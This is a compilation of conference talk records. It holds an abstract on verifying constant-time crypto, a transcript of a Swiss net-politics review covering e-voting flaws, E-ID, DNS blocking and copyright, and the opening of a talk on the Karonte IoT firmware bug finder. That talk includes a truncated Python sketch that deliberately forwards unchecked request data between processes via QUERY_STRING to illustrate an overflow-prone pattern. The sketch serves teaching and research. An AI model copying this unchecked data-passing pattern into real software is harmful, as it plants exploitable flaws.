Software bugs and timing leaks have destroyed the security of every Chromebook ECDSA "built-in security key" before June 2019, ECDSA keys from several popular crypto libraries, the Dilithium post-quantum software, the Falcon post-quantum software, and more. Will we ever have trustworthy implementations of the cryptographic tools at the heart of our security systems? Standard testing and fuzzing catch many bugs, but they don't catch all bugs. Masochists try to formally prove that crypto software does its job. Sadists try to convince you to do your own proof work and to let them watch. After years of pain, a team of fifteen authors has now proudly announced a verified crypto library: fast but unportable implementations of a few cryptographic functions specifically for CPUs that aren't in your smartphone. This is progress, but the progress needs to accelerate. This talk will highlight a way to exploit the power of modern reverse-engineering tools to much more easily verify crypto software. This relies on the software being constant-time software, but we want constant-time software anyway so that we can guarantee security against timing attacks. Constant-time software is also surprisingly fast when cryptosystems are selected carefully. This talk is meant as an introduction for a general audience, giving self-contained answers to the following questions: What are timing attacks? What is constant-time software? What are some examples of constant-time crypto? How can we be sure that code is constant-time? What do these reverse-engineering tools do? How does constant-time code help these tools? How do we get from reverse engineering to guaranteeing correctness? The talk will be given as a joint presentation by Daniel J. Bernstein and Tanja Lange.
10.5446/53138 (DOI)
We will now get a situation report from Kira, from Gandhi and from Paki, from Switzerland, from the Swiss net-politics scene. They deal with more or less the same topics that we have already chewed through in German net politics, over and over again, on an endless loop. And now we will hear from the three of them how things are developing in our neighbouring country and what the latest findings are. Please join me in welcoming them. Yes, thank you for the introduction. We are very pleased that we can take you on a journey through net politics between Lake Constance and the Matterhorn here at the 36th Chaos Communication Congress. Your tour guides for the next hour are Simon Gantenbein, Paki Stäli, and my name is Erik Schönenberger. We are from the Digitale Gesellschaft, a non-profit organization in Switzerland. We work on the issues that digitization and networking raise for society, we do this from a civil-society perspective, and above all we are an alliance, an association of many different organizations in Switzerland that work on net-political topics. We will start right away, and I hand over to Paki. Thank you. We begin our journey across Switzerland, from Lake Constance to the Matterhorn, in the eighth-largest city, not of our country but of Canada: Vancouver. Those in the know should already be able to guess which topic this is about. It is about e-voting, as it is officially called, or, as we say, cyber voting. Last year we unfortunately had to report that one of the two approved e-voting systems is no longer approved and will not be continued, apparently for cost reasons, because security apparently costs money; who would have thought? There are also new requirements, such as universal verifiability, which now applies to the new generation of e-voting systems. One manufacturer of such systems is Scytl, a software company in Spain, and Swiss Post operates Scytl's system. Now, Scytl does pretty much everything the e-voting heart desires, from online votes to voting machines, and that does not always go well. Research by Republik, an online newspaper in Switzerland, revealed that Scytl had been commissioned to run elections in Ecuador, in the jungle, and in the jungle there is not much internet, so those ballot boxes ended up as little more than glorified paperweights. The scans then had to be counted in Spain, which went relatively quickly, because a few Scytl managers were kept back in Ecuador, as guests, of course. Now, the pressure on the Post and Scytl for this to work in Switzerland was high, so they said, let us try to prove that the system is secure, and they had an idea: a public intrusion test. The source code has to be published, that is what the ordinance says anyway, and a whole 150,000 Swiss francs were invested in bug bounties, which is of course an extremely small amount; I assume the whole system costs ten or twenty times that, whatever. And so the source code was published, but it was more like a dump: there were something like three commits in it, and you only got the code under an NDA, and the NDA said that vulnerabilities may not be published.
That is supposedly responsible disclosure, which means that if the Post just keeps checking in every 45 days, these vulnerabilities stay under wraps. Now, no security institute and no researcher of any standing will let themselves be roped in for such a small sum, and they will certainly not do a pen test under those conditions. And information does not exactly resist the urge to be free: very quickly, clones of the code were distributed, or, let us say, left lying around. The Post, which apparently reads Twitter now, said: well, once it is already public, it can no longer be leaked. Which was true at the moment that tweet was written, of course, because by then it really was public; but before that you could only get the code under the NDA. And, by the way, you are violating copyright if you redistribute our code; that went over well. They then had the repositories, the clones, taken down, but not fast enough, because it was only through the leak that renowned security researchers could throw themselves at the topic, for example the Open Privacy Research Society, from Vancouver, and, representing them, Sarah Jamie Lewis, the executive director, who dug into this code. She found that the implementation of the basic concepts of this e-voting, the zero-knowledge proofs, all had flaws, every single one. With that, the backbone of the whole solution was broken, because the zero-knowledge proofs are what guarantee that someone can only vote once, that their vote is counted correctly, and that the overall result is added up correctly. Her verdict in the end was: burn it with fire. That was also my impression when I looked at the system as a crypto layperson: I do not understand all the cryptography, but I do understand that if you load crypto keys that cannot be loaded, then fall back to something strange and merely write something into a log that nobody reads, the system cannot work reliably. When I read that tweet, I thought of this picture; that is probably how Sarah must have felt. Now, the Post really does read Twitter, because a few days later it turned out: oh, it was not so bad, bug fixed, let us just move on. The problem is, and every software developer knows this, you write one line of code to fix something and you get two new bugs, at least that is how it is for me. And the core problem was that this whole system would have gone live exactly like that, had we not put massive pressure on the Federal Chancellery, the Post, Scytl and all the other players, on the parliamentarians we actually talked to. The system would have gone live without anyone knowing about these vulnerabilities, or with people knowing about them but keeping them to themselves. And I thought of this picture again when the National Council, the large chamber of our national parliament, decided to stop e-voting. Now, that is not yet a reason to celebrate, because the small chamber, the Council of States, will surely reject this motion.
And that is why it is extremely important that you support the initiative for an e-voting moratorium, with which we want e-voting to be put on ice for the coming years, so that the state of the art can then be reassessed to see whether there is any way to build a secure e-voting system, and the whole question can be evaluated anew. And our journey continues with Simon, in Bern. Right, I will take you to Bern. We will talk briefly about the E-ID, and as our location in Bern we have this door. The politically engaged among you will recognise it: this door belongs to the Bundeshaus, the parliament building. It is the place where the signatures for initiatives and referendums are handed over. Now, the E-ID — that was a fight and still is a fight. The problem is that the federal government would like to offer an electronic identity, but it is disputed how this identity should be designed and what its scope of functions should be. Within the federal administration there is the view that it is a login, that you could do e-commerce with it — that is the kind of use case that gets mentioned. But clearly, the E-ID is not about that. The E-ID is not a login; it is about being able to carry out transactions that require official identification — for example concluding legally binding contracts, or signature collections, which could then also be done digitally, saving a lot of paper and a lot of trees. Our position is that the E-ID should be used for political participation and not as a login for some commercial products. The story of the E-ID goes back a few years. The federal government drew up various concepts, concept studies were carried out, and two buzzwords keep recurring in these documents: an electronic identity must be secure and trustworthy. One concept that was examined was similar to Germany's new identity card; it was discarded, however, and the conclusion was that the best solution for an electronic identity was to leave it to private providers — so-called identity providers. A few years ago the federal government already had an E-ID project, the SuisseID — not spelled as shown here, but "Suisse" in French — and that project failed. The new edition comes from a consortium, the SwissSign Group, whose members include Swiss Post, the SBB, Swisscom, banks and insurance companies, and they are now supposed to take on this sovereign task for us, so that we can identify ourselves electronically in the digital space. While the process was running in parliament, the Digitale Gesellschaft, Public Beta and WeCollect commissioned a representative survey asking: who should actually offer such an electronic identity? You can see the blue bar is rather large, and when we reveal the numbers, 87% of respondents want an E-ID from the state and only 2% from private companies. A further question in the survey was whether the E-ID is a need at all, and here 43% of respondents said yes, we would like an electronic identity within the next three years.
This survey — even though it was commissioned by us — is very interesting, because we just had the theme of "secure and trustworthy", and it becomes clear that citizens know where they place their trust when it comes to an electronic identity: with the state, and not with corporations and large companies. Whenever there is an emergency we try to exert political influence, and when the emergency is particularly big, a nerd borrows a suit — since he does not own one — hangs the hoodie on the hook, and so we tried to make our voice heard in the relevant pre-advising committee of parliament. As a small aside: a "Kommission" in Switzerland is what a parliamentary "Ausschuss" is in Germany — bills are first discussed in a smaller group before they are debated in the plenary, and proposals for the plenary are worked out there; so the German equivalent would be the Ausschuss. We also had some supporters, parliamentarians who backed our call for a state-run rather than privately run E-ID, but the support fell just short: the parliamentary majority said, we do not care, we want a private solution with this SwissSign consortium. And so it came as it had to come: if you are not happy with a political bill in Switzerland, you launch a referendum, and that is what we did. Some of you may know the platform WeCollect. With WeCollect you can collect signatures electronically — or rather, the signature form is largely pre-filled and already addressed to the right place when you print it. We had a boost at the start thanks to a big mobilisation and information campaign, which worked: within a few days we had a great many signatures. But then, as always, we also had to take the classic route, so we went out onto the streets in snow and rain and asked individual citizens to support our cause. For a referendum you have to collect 50,000 signatures within 100 days — that is really hard graft — and at this point a heartfelt thank-you to everyone who contributed a signature or passed the signature sheet around their circle of friends. Once the signatures are back in the back office, they have to be sorted and sent to the municipalities; the municipalities certify that the person is indeed registered there, then send them back, and they are counted. A great deal of administrative effort. A state E-ID would actually be a practical solution here, but unfortunately we are not there yet. I can report good news: the referendum deadline runs out on 16 January, and the curve has taken off. We will not merely have 50,000 signatures; we expect 70,000. We have taken part in political referendums once or twice before, including against the surveillance laws. There it was about fundamental questions, and we knew from the start that winning before the people would be difficult. Here it is clear — you saw the survey earlier: the majority wants a state E-ID, and we are very confident that we will win the referendum campaign and thereby compel parliament to produce a new version of this law with the corresponding changes.
For anyone who wants to come: on 16 January at 13:45, on the Bundesterrasse in Bern, the signatures will be handed over in a festive ceremony, and presumably in the coming May or September the Swiss people will then vote on it. And now Paki takes you to a very special place. Yes, we find ourselves somewhere in the cyberspace around Switzerland. The topic is network blocking. Since the first of January we have had a law, the Money Gaming Act, which regulates gambling, lotteries and so on — and for politicians it contains network blocks. For the politicians watching us, network blocks look roughly like this. Yes, I have to say it every year: we always have a symbolic picture like this, and yes, we know that you are watching us over Tor. Anyway, these network blocks are now in the law. They were supposed to start on 1 July; sometime in June the technical specification was published, and there were just a few problems if you looked more closely. But you knew it was coming, and technically it is relatively simple: if my-lovely-betting-site.com ends up on this list, it gets blocked and you are served a nice stop page. The solution chosen here is DNS blocking, meaning that DNS answers are falsified, with all the technical shortcomings that entails. Of these block lists there are, conveniently, two. One comes from the Federal Gaming Board. On one side you see the domain names, and next to them the date the blocking order was issued; it is published in the Federal Gazette, and the providers then have a few days to implement the new entries. You will also notice the list is helpfully sorted alphabetically rather than by date, which of course makes things so much easier. The other list comes from Comlot, the lottery and betting commission — again a PDF like this one. By now updates are arriving as well, as you can see from the new dates further down. Now, I had a look at these sites when the lists were first published; two or three days later I clicked my way through the swamp. The first list, from the Gaming Board, had 39 entries from 32 different operators — some operators are clever and register my-lovely-website.com number 1 through 17, so they appear several times, but it is the same operator. The Comlot list was a bit more extensive: 65 entries from 29 different operators. At the time I tested them, 20% of the domains blocked me as a Swiss user when I tried to access them: I either got a block page from the operator itself — you are not allowed to use this site — or I could not create an account because Switzerland was missing from the list of countries. In other words, we have overblocking of 20%. And if we look at what such a block page looks like — one moment, I need to switch — there: as a layperson I have no chance of using this offering at all. Yet the law says it should not actually be blocked, because the operator does not offer its service in Switzerland in the first place. But it gets worse. This plumber and photovoltaics specialist got blocked. It was probably a misconfiguration, but if you visited solobed1.com from Switzerland, you got this page.
It was a misconfiguration, but it still illustrates the problem: far too much is being blocked. As for circumventing the blocks — you are surely wondering how I could even make these screenshots — type "Digiges" and "DNS" into your search engine of choice and you will find our new offering. For some time now we have been running an uncensored, no-logging DNS resolver, reachable only over encrypted transports, because unencrypted DNS is, shall we say, on its deathbed. We also publish a transparency report. And now we travel on with Kire, this time taking the S-Bahn to the canton of Glarus. Thank you. The next topic is net neutrality. Net neutrality means that all data packets on the internet are transmitted with equal priority. This is an absolutely central element and really the foundation of the internet's success: the principle of innovation without permission, under which I do not have to ask anyone whether I may offer a service on the internet. This is a real example from Portugal. Through so-called zero rating, certain offerings are included in the internet or mobile subscription, while for others you have to pay extra. We do not want it to become possible in Switzerland that, through such offers, transmission suddenly starts to stutter for services that are not on the list, i.e. not included. The topic of net neutrality has occupied us for many years. Concretely, it began in 2013, when we were invited into a working group of BAKOM, the Federal Office of Communications, to discuss whether and how net neutrality could be regulated in Switzerland, that is, enshrined in a law. There were many meetings and tough negotiations over a whole year, and we were really always one step behind the corporations' lawyers, who more or less set the topics and sub-topics. Accordingly, the result was disappointing: a rather harmless report was published, more or less a juxtaposition of the arguments of the companies and organisations involved. A consultation followed in 2016 and a draft law for parliament in 2017. And based on that BAKOM report, these drafts really only talked about transparency — only transparency was provided for, in place of net neutrality. That would have amounted to a departure from the best-effort principle; it would effectively have created transparent discrimination, and we would have been clearly worse off than today, than without any law at all. In November 2017, based on our consultation response, we were invited to explain our position in the pre-advising committee of parliament. We deliberately used this opportunity to present our own draft of how net neutrality would have to be written into law in our sense. And things did indeed start to move: the committee drew up a new draft based on our proposal and adopted it, and it was also accepted by the National Council, the large parliamentary chamber in Switzerland. It then went to the small chamber, the Council of States, and there exemptions for so-called specialised services were added to the net neutrality provisions.
That was a discussion similar to the one held in the EU when net neutrality was debated there, and the great danger with this exemption for specialised services was that the purpose of the law would have been undermined again. In this phase we very deliberately sought dialogue, got involved, prepared information and made it available to the members of parliament. The example of net neutrality, of this law, shows that with a certain persistence you can actually achieve something. And here the circle closes back to the canton of Glarus: I remember how, in this phase, a member of the Council of States from that canton called me late on a Friday afternoon and opened the conversation with: "Grüezi — you are not satisfied with our work." The law was subsequently passed; this regulation of net neutrality is part of the Telecommunications Act. Exemptions apply for specialised services, but they are now framed so that they only cover the provider's own services, such as television or internet telephony. The law is a big success for the net-political community in Switzerland, and it will almost certainly come into force in the second half of next year. For the next stop we travel on to Zurich. Exactly, and we will take on copyright. This year Switzerland tackled a revision of its copyright law, and before we plunge into the technical details, a small preliminary remark. In Switzerland, before a bill reaches parliament, you can comment on it — these are the so-called consultation responses. Associations are formally invited, but every one of you can also say: I do not like this law or this proposal, for the following reason. For the new copyright law, 1,200 such consultation responses arrived at the relevant department. That is almost a DDoS. One of the hard nuts in the newly planned copyright law was the ancillary copyright for press publishers, which the Association of Swiss Media pushed through. Technically it is a remuneration obligation for journalistic content — you can also call it a link tax: if you link to a journalistic site, you are supposed to pay a levy, similar to the levies known from, for example, recording media. That an ancillary copyright is not a good idea can be seen from the European comparison; I have three examples. First, France: an ancillary copyright was introduced there, and Google said, we do not want to pay, we will simply hide the content in Google News. Second, Germany: an ancillary copyright was introduced there too, and once the law was in force, the very first act was to grant Google an exemption — a law was created and its teeth were pulled at the same time. The third example is Spain: there the ancillary copyright came without exemptions, and the consequence was that traffic to news sites dropped by 10 to 15 percent. While the new copyright law was in progress, an alliance for fair copyright formed in Switzerland — here you see one or two logos that might look familiar to you. We are now in March of this year, and at the same time something else was happening, Europe-wide.
Perhaps you still remember the Article 13 discussions about upload filters. The two copyright laws have nothing to do with each other, but there, within a short time, 5 million signatures were collected against the upload filter. In Switzerland we were wrestling with our copyright law while, at the same time, a movement emerged at the European level. That movement manifested itself in a Europe-wide day of protest, and we used the opportunity to hold a demonstration in Switzerland as well, against our new copyright law — which is why we are now in Zurich. More than 1,000 people joined this demonstration to protest against the new copyright law. A few days later we were invited to the relevant committee of the Council of States, and we asked them to please delete the ancillary copyright, because it simply makes no sense. What I will show you now is a video from the Council of States chamber. Here you see Ruedi Noser; he was the committee president, the chair of this committee, and he explains to the plenary that the ancillary copyright is being removed from the new copyright law: "On the ancillary copyright we held hearings — the professional association of journalists and the publishers on one side, the representatives of the Digitale Gesellschaft and the company Google on the other. One can of course have divided opinions on whether a single company should be invited to a hearing or not. But since the ancillary copyright is first and foremost a Lex Google, we discussed this at length in the committee and decided to invite them to the hearing. I can report that the setting of the hearing — the presentation of the administration's supplementary reports, the two experts with their expertise, and the discussion with the representatives of both sides — was very instructive. At this point I want to state clearly that the motion to send the bill back clearly contributed to improving the quality of the legal text. As president it is of course not always easy to say such a thing, colleague Bischof." The new copyright law was then passed, and the ancillary copyright was taken out. There were other points in the new copyright law that we did not like, but at least we were able to remove this one part — so you could call it a partial success. Very nice. Excuse me. And now we go with Kire deep into the canton of Aargau. Yes, we jump to Oberwil-Lieli, the municipality that you can comfortably drive around on the right. The topic is the Data Protection Act. The currently valid Data Protection Act dates from 1992 and is getting on in years; at its introduction it already had a few years of debate behind it. The law is currently undergoing a total revision and is being negotiated back and forth between the parliamentary chambers. The new law is supposed to be made compatible with the European General Data Protection Regulation, the EU GDPR, so that we continue to belong to the European data area, i.e. so that personal data can continue to be transferred freely across borders. One of our demands is that the level of protection must not be lowered compared with today — and unfortunately that threat exists in several places. So it is very important that the law is revised and modernised. The parliamentarian from Oberwil-Lieli sees it somewhat differently.
For him the law is a monstrosity; he has never seen such a massive accumulation of senseless regulations, and we already have, God knows, a large number of senseless and unnecessary laws. It can be said that for the SP, the Greens and the Green Liberals the draft does not go far enough, while for the centre-right parties it is too strict — and they often forget that compatibility with the EU GDPR also matters for the economy, that is, that we have to raise the level of protection to that of the EU GDPR. And the SVP rejects the law outright because it has something to do with the EU. A current point of contention is tracking and profiling — one of the big debates currently running in the chambers. Profiling means personal data being evaluated automatically in order to derive or predict personality traits or patterns of behaviour. Under the Data Protection Act in force today, where consent to profiling is required, it is only valid if it is given voluntarily and explicitly, after adequate information. Only in this way can it be ensured that such consent cannot be obtained through blanket acceptance of general terms and conditions, or even buried in a privacy policy. A striking example of such profiling is surely the Cambridge Analytica scandal, where psychological profiles of 87 million people were compiled with the help of a Facebook app and then deployed in the US election campaign through so-called microtargeting. But in Switzerland, too, there are more and more moves in this direction: the Swiss publishers are currently introducing, step by step, a login requirement on their portals. They want to copy the business model of Google, Facebook and co. and monetise the personality traits of their readers. The intention is to serve personalised advertising, but also personalised content. This profiling is what the current debate is about, and it looks as though parliament could agree on a risk-based approach. That means parliament would distinguish between profiling with a high risk and profiling with a medium or low risk, and require consent accordingly — or not. As one criterion for high-risk profiling it is currently envisaged that the data come from different sources. That is a poor criterion, because as we just saw with the Cambridge Analytica scandal, a single data source can also carry a high risk. The other criterion is that the processing be systematic and extensive and affect different areas of life — but what exactly is meant by "extensive processing" is anything but clear. And even if parliament did agree on such a risk-based approach, a right to object would still be missing, unlike under the EU GDPR. We demand that, as a counterbalance, wherever the law does not require consent to profiling, a simple opt-out option be created for the persons concerned.
So that it is possible to object to this profiling in a simple way — by unticking a checkbox — while still being able to use the service. And such a simple opt-out option would also suit this website rather well. We travel on to Lucerne. Yes, and in Lucerne it is about "data wealth". You can actually earn good money with data, and more data leads to so-called data wealth. That is what this gentleman from the canton of Lucerne thought as well. He had sent Kire 22 unsolicited e-mails and then could not properly answer — or rather, did not answer — a data access request. So Kire filed a criminal complaint for violation of the Unfair Competition Act, which covers spamming and unfair competition. He was convicted and fined 250 francs, plus 410 francs in court fees. That is quite a few thousand e-mails he now cannot afford to send, you would think. But curiously, a few days after that penalty order came into force, spam from the very same XY Group GmbH arrived again at the Big Brother Awards contact address — one can safely say the next penalty order will be on its way. That data you do not have cannot be leaked is something Swisscom has learned. Swisscom has its product myCloud — a storage service, a Dropbox or Nextcloud for the poor — advertised, of course, with Swiss precision and reliability. In this case that meant that 98% of users did not lose their data; and of the 2% whose data was lost, only 5% of that data was gone. So, no problem — after all, the terms and conditions say data loss can happen. Those affected received a voucher; whether they redeemed it for this very product, I do not know — perhaps not. Swisscom decided differently in the next case, where it distributed data generously: three and a half thousand Credit Suisse employees each received the connection records of a colleague. Which is surely no problem, because connection records are only metadata — those you can store and pass around, and there is nothing to it if I happen to call my colleague's girlfriend all the time. This is somewhat reminiscent of the case of the Coop Bank, which a few years ago delivered some ten thousand statements to the neighbours — I believe it was even regional, within the same village. That must have made for some lovely conversations. Then, UBS has trouble with USB sticks. This came out only a few weeks ago. An employee moved to Germany but stayed with UBS, and she still had a USB stick with her; everything else had been nicely wiped. On this USB stick there was still data of customers from Germany and France. Then, I believe in 2014, there were a few house searches at Swiss bank branches in western Germany, and the data came into the possession of the tax authorities. They passed it on to France, and a Frenchman sued the bank for violating banking secrecy. The case went all the way up to the Federal Supreme Court, where it was dismissed. The reasons are not yet entirely clear, but the upshot is: he has to pay his back taxes, and the court bill on top. The next case is a bit more curious: anyone who wants to move anonymously on the net needs Tor.
That should by now be clear to everyone, I hope. What you should not do is log in to some PC in an Apple Store, or use its Wi-Fi — because there is video surveillance there. The police traced the IP address, went to two Apple Stores and took screenshots from the video cameras, which were then printed out and put on file — that is how it is done, modern police work. The problem was that the images were a bit poor. No problem — we have CSI Zurich. The accident forensics unit has 3D surveying, 3D photogrammetry, a 3D laser scanner; normally they use it to produce accident sketches. With this, the accused was then measured: they stuck markers on his joints and measured him more or less biometrically, surveyed the store with the camera positions, and in the end the investigating authority concluded that it was established with sufficient legal certainty that this is the person — on the basis of these 3D models. So, if you get up to mischief on the internet, please not from an Apple Store. And on we go with the last part of our journey: we have finally arrived, with Kire, in Zurich. Thank you. To finish, I would like to point out a few events and meetings. This year in February we held a Winterkongress, and there will be another one next February; with the third edition we are moving to the Rote Fabrik in Zurich. It will take place on Saturday, 22 February next year, and again around 28 talks and workshops will be offered. Above all, though, the Winterkongress is meant for exchange. The detailed programme and tickets are available now. In April we will then open a "Datenreisebüro" in Zurich: together with other associations we are moving into shared hackerspace premises — the CCC Zurich, the LUGS and the Swiss Mechatronic Art Society will come together at this location near the Hardbrücke in Zurich. There will also be various meetings in 2020. Especially worth highlighting is the netzpolitik meeting on 9 May in Bremgarten, our twice-yearly gathering where the more active members and organisations of the Digitale Gesellschaft spend a day discussing the topics that will matter in the coming six months. Here at Congress we will meet right after this talk, at 15:30, in Lecture Room M2, where we will also exchange views on the topics of the coming year and get into conversation. Lecture Room M2 is through the glass hall and then to the right before the Adams hall; we will head over there together right after this session. We would be delighted to see as many of you as possible there. We are also present for all four days of Congress with an information stand, right below this hall — we would be happy to see you there as well. Now I think we still have a few minutes for questions, and we are at your disposal. Then let me thank the three of you warmly for this information and this fine talk. You know the drill: if you want to ask a question, there are three microphones in the hall, and someone is already standing at number 1. Yes, hello everyone. Many thanks for this summary and also for your valuable work. I have a question about the E-ID. We want to win this fight.
We know that in Switzerland the business lobby is relatively powerful, especially in votes on initiatives and referendums, and they have one particularly strong argument. First of all, Ruedi Noser — whom we saw earlier, and who let Google convince him not to back the ancillary copyright — has also said that you, the Digiges and the CCC and everyone, are effectively doing lobbying work for Google if you oppose this law: if Swiss private companies cannot join forces and act as identity providers, then this interface, this function, will be offered by Google and Facebook and so on instead. He says this on quite a few panels; I have experienced it myself. So that will be one of the most powerful arguments. And I think the second argument is that they will of course claim that the state does play an essential role — perhaps not in the sovereign issuance of the E-ID, but above all in the verification of identity, where the state is heavily involved. Those are, I think, the two main arguments, and I wonder what your strategy is for convincing the voting population — because I think the main problem will also be that the 87 percent who said they want a state E-ID may well think so, but they first have to be activated. And I think another problem will be that the indifference of voters on this topic is still relatively large. Well, with the E-ID the first question, in my view, is what this E-ID is to be used for. From our point of view it is quite clear: it is about carrying the conventional identity documents over into the digital world. We see the need for electronic identification, for an electronic identity document, wherever you have to identify yourself today — when I want to take out a mobile phone contract, open a bank account, or use e-government services. But it is not about creating a general, universal login, and certainly not a centralised one, with the E-ID. And that is a different goal from what SwissSign wants or what Google does. With an E-ID we do not want to create a competitor to a Google login or a Facebook login — we could not do that with a Swiss law anyway; that is the wrong lever. You might be able to do that with international standards, but not with legislation in Switzerland. Companies outside Switzerland would not align themselves with a Swiss law, nor would they adopt a Swiss E-ID so that people can log in to foreign services. It really is about those services where an obligation to identify yourself genuinely exists. Thank you. A quick question to the Signal Angel: do we have questions from the internet? No questions from the internet, but at least one person from Switzerland was listening. Nice to hear that people are watching. Very good, the target audience is there. Is there still someone at microphone 1? Please. Thank you very much for the talk. I also have a question about the E-ID.
This referendum campaign was presented here rather as: we are going to win this. I teach at a school and have young students, and when I look at the list of supporters there are a few names that come across as rather off-putting: the Swiss Council of Senior Citizens, the Association for Senior Citizens' Issues, a self-help organisation for seniors. That is not particularly sexy. What is the narrative with which we can win young people over for this cause? What do you advise us? There are probably two groups who view this E-ID, as it has now been passed, critically: those who are in favour of an E-ID but say that this particular design is wrong — that is more the progressive side — and then, of course, many people, among whom I would count the senior citizens' associations, who view the whole of digitalisation rather critically and take a dismissive position from that standpoint. Then a second question from microphone 1. To what extent are there ideas to tie the concept of decentralised IDs to this E-ID? That is, the state as provider, as certifier of the identity, but embedding the whole thing in a decentralised-ID context. Decentralised — that is also what we would like to see. The approach we would favour, though, is one like Germany's, where the cryptographic identification attributes are put directly onto the identity documents, for example onto a smartcard. Then the issuance of an E-ID would happen together with the issuance of the conventional identity document. You would not need any separate infrastructure — no new central database, as is currently envisaged at fedpol — instead, at the same offices where the identity card is produced today, the smartcard could be provisioned with the identification attributes. You could also put a qualified certificate on it, so that you could create electronic signatures with it; that possibility is missing in the adopted E-ID Act as it stands. And with such an approach you would not need these central infrastructures, the identity providers, at all — we would prefer them to be operated neither by the state nor by private organisations. So more in the direction of self-sovereign identity. Yes. Good, I see no further requests to speak, so let us close the talk. Many thanks, Kire, Ganti and Paki. And...
The intensity of the fight for freedom in the digital space is not letting up in Switzerland either. We look back at the net-political year 2019 between Lake Constance and the Matterhorn, covering the topics that were relevant and will remain relevant, and we show what to expect from the Digitale Gesellschaft in Switzerland in the new year. Topics include: Electronic identification (E-ID): The law regulating electronic identification has been passed. The digital ID is to be issued by private companies. We have launched the referendum against the law. E-voting: A public test of the last system still in the running was devastating. How the fight for trust in Switzerland's direct democracy continues. Network blocking: The first law in which network blocks are explicitly enshrined came into force this year. What its implementation looks like. Ancillary copyright: What made it into the new copyright act — and how the ancillary copyright was defeated. Data protection: Where in Switzerland particularly large amounts of «data wealth» could be observed, and what the login and tracking alliance is about. Net neutrality: After a long fight, Switzerland gets net neutrality enshrined in law; the act will come into force in the coming year. Digitale Gesellschaft in Switzerland: Winterkongress, Big Brother Awards and other activities. After the talk, all interested persons are invited to continue the discussion at a meeting. Activists from various net-politics organisations in Switzerland will be present (Digitale Gesellschaft, CCC-CH, CCCZH, Piratenpartei Schweiz).
10.5446/53139 (DOI)
So, our next speaker for today is a computer science PhD student at UC Santa Barbara. He is a member of the Shellphish hacking team and he's also an organizer of the iCTF hacking competition. Please give a big round of applause to Nilo Redini. Thanks for the introduction. Hello to everyone. My name is Nilo and today I'm going to present my work, Karonte. IoT devices are everywhere: research suggests that we will reach 20 billion units by the end of next year. A recent study conducted this year, in 2019, on 16 million households showed that more than 70% of homes in North America already have an IoT network-connected device. IoT devices make everyday life smarter. You can literally say "Alexa, it's cold" and Alexa will interact with the thermostat and increase the temperature of your room. Usually the way we interact with the devices is through our smartphone: we send a request over the network to some device, a router or a door lock. Or we might send the same request through a cloud endpoint, which is usually managed by the vendor of the device. The other way is through IoT hubs: the smartphone sends a request to some IoT hub, which in turn sends a request to some other devices. As you can imagine, IoT devices use and collect our data, and some data is more sensitive than other. For instance, think about the data that is collected by a smart light bulb versus the data that is collected by a security camera. Such IoT devices can compromise people's safety and privacy: think, for example, about the security implications of a faulty smart lock or of the brakes of your smart car. So the question that we asked is: are IoT devices secure? Well, as this slide — which is a bit blunt — suggests, they are not. In 2016, the Mirai botnet compromised and leveraged millions of devices to disrupt core internet services such as Twitter, GitHub and Netflix. In 2018, 154 vulnerabilities affecting IoT devices were published, which represented an increase of 15% compared to 2017 and an increase of 115% compared to 2016. So then we wondered: why is it hard to secure IoT devices? To answer this question, we have to look at how IoT devices work and are made. Usually, when you remove all the plastic and peripherals, IoT devices look like this: a board with some chips on it. Usually you can find the main chip, the microcontroller, which runs the firmware, and one or more peripheral controllers which interact with external peripherals such as the motors of your smart lock or cameras. So though the design is generic, implementations are very diverse. For instance, firmware may run on several different architectures such as ARM, MIPS, x86, PowerPC and so forth, and sometimes these are even proprietary, which means that if a security analyst wants to understand what's going on in the firmware, they will have a hard time without the vendor specifics. Also, the operating environment has limited resources, which means that devices run small and optimized code; for instance, vendors might implement their own optimized version of some known algorithm. Also, IoT devices manage external peripherals that often use custom code — again, with peripherals we mean cameras, sensors and so forth. The firmware of IoT devices can be either Linux-based or a blob firmware. Linux-based firmware is by far the most common: a study showed that 86% of firmware samples are based on Linux. On the other hand, a blob firmware is usually an operating system and user applications packaged in a single binary.
In any case, firmware samples are usually made of multiple components. For instance, let's say that you have your smartphone and you send a request to your IoT device. This request will be received by a binary, which we term a border binary — in this example, a web server. The request will be received, parsed, and then it might be sent to another binary, called a handler binary, which will take the request, work on it, produce an answer, and send it back to the web server, which in turn will produce a response to send to the smartphone. So, to come back to the question — why is it hard to secure IoT devices? — the answer is because IoT devices are, in practice, very diverse. Of course, various works have been proposed to analyze and secure firmware for IoT devices. Some of them use static analysis, others use dynamic analysis, and several others use a combination of both. Here I list several of them; at the end of the presentation there is a bibliography with the titles of these works. Of course, all these approaches have some problems. For instance, dynamic analyses are hard to apply at scale because of the customized environments that IoT devices work in: usually, when you try to dynamically execute a firmware, it is going to check whether the peripherals are connected and working properly, and if you don't have the peripherals, it is going to be hard to actually run the firmware. Also, static analysis approaches are based on what we call the single-binary approach, which means that binaries from a firmware are taken individually and analyzed. This approach might produce many false positives. For instance, let's say again that we have our two binaries — this is actually an example that we found in one firmware. The web server will take the user request, parse the request and produce some data, set this data in an environment variable, and eventually execute the handler binary. Now, if you look, the parsing function contains a string comparison: we check if some keyword is present in the request, and if so, it just returns the whole request; otherwise, it constrains the size of the request to 128 bytes and returns it. The handler binary in turn, when spawned, will receive the data by doing a getenv on QUERY_STRING, but it will also do a getenv on another environment variable, which in this case is not user-controlled — the user cannot influence the content of this variable. Then it is going to call a function, process_request. This function eventually performs two string copies, one from the user data and the other one from the log path, into two different local variables that are 128 bytes long. Now, in the first case, as we have seen before, the data can be larger than 128 bytes, and this string copy might result in a bug; while in the second case it will not, because here we assume that the system handles its own data properly. So, throughout this work, we are going to call the first type of binary a setter binary — the binary that takes the data and sets it for another binary to consume — and the second type of binary we will call a getter binary. So current bug-finding tools are not great, because either bugs are left undiscovered, if the analysis only considers those binaries that receive network requests, or the analysis is likely to produce many false positives, if all binaries are considered individually.
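To make the setter/getter split concrete outside of C firmware, here is a small, self-contained Python sketch — my own toy example, not code from the talk or from Karonte — in which one process hands attacker-controlled data to another through the QUERY_STRING environment variable, the same IPC pattern and data key described above. The 128-byte threshold simply mirrors the buffer size in the example.

# Toy illustration: a "setter" process passes data to a "getter" process
# through the QUERY_STRING environment variable, mimicking the
# web-server / handler-binary split described above.
import os
import subprocess
import sys

def setter(user_request: str) -> None:
    # The web server would parse the request here; in the buggy path the
    # data is forwarded without any length check.
    env = dict(os.environ, QUERY_STRING=user_request)
    # Spawn the handler, handing the data over via the environment (the IPC "data key").
    subprocess.run([sys.executable, __file__, "--getter"], env=env, check=True)

def getter() -> None:
    # The handler consumes the shared data key; in C this would be
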